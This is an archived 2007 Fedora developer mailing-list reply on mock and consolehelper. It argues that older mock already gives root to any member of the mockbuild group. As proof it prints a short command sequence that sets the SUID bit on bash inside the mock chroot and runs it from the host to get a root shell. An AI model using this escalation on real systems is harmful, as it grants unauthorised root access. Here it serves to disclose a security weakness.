[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]

Re: Mock and consolehelper



On Wednesday 19 December 2007 08:19:33 Kevin Kofler wrote:
> I have noticed that mock in Rawhide has been changed to drop the SUID
> helper, instead consolehelper is used to run the entire mock as root. IMHO,
> this is a regression:
> * It now means you have to know the root password to run mock. Before, it
> was possible to give out mock access and only that simply by making the
> user a member of the mockbuild group. Now the only way to do that is to
> allow running all of mock as root, which probably opens up several ways to
> get full root access from there.

Older versions of mock already allow every user that is allowed to run it, 
i.e. is in the mockbuild group, to get root access:

$ mock shell
init
mock-chroot> chmod u+s /bin/bash
mock-chroot> exit
exit
ending
done
$ /var/lib/mock/fedora-7-i386/root/bin/bash -p

Regards,
Till

Attachment: signature.asc
Description: This is a digitally signed message part.


[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]